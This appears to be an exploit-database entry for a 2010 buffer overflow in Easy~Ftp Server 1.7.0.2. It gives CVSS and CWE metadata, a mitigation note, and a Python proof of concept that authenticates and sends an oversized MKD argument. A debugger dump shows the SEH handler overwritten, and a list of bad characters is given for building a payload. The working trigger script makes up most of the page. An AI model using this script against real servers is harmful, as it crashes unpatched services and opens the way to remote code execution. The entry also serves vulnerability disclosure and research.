Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)

vendor:

Easy~Ftp Server

by:

loneferret

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Easy~Ftp Server

Affected Version From: 1.7.0.2

Affected Version To: 1.7.0.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2/SP3 Professional

2010

Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)

This exploit takes advantage of a buffer overflow vulnerability in Easy~Ftp Server v1.7.0.2. It specifically targets the MKD and DELE commands, using a payload that contains bad characters. By sending a specially crafted request, an attacker can cause a stack-based buffer overflow, potentially leading to remote code execution.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, it is recommended to restrict access to the affected application or use alternative software.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date Found: 13/02/2010
# Developer contacted: 14/02/2010
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP2/SP3 Professional
# Nod to the Exploit-DB Team

# Vulnerable commands: MKD / DELE
# badchars: \x00 \x0a \x2f \x5c

#SEH chain of thread 000001D8, item 0
# Address=0081FC60
# SE handler=41414141



#EAX 41414141
#ECX 0081FCCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#EDX 005F3958
#EBX 00000000
#ESP 0081FB14
#EBP 00000000
#ESI 0081FCCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#EDI 00000000
#EIP 0040BFDC ftpbasic.0040BFDC
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDD000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_INVALID_PARAMETER (00000057)
#EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
#ST0 empty %#.19L
#ST1 empty +UNORM 03E9 00000000 00000000
#ST2 empty 0.0
#ST3 empty 0.0
#ST4 empty -UNORM FAB4 00000000 00000002
#ST5 empty +UNORM 09B8 00000011 7C910732
#ST6 empty %#.19L
#ST7 empty -??? FFFF 7C910738 7C90EE18
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1


import socket


buffer = "\x41" * 505


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('MKD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close